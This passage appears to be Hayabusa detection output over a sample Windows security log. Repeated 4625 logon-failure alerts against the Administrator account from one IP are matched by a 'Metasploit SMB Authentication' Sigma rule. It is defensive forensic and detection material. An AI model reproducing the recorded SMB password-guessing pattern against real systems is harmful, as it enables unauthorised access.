Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
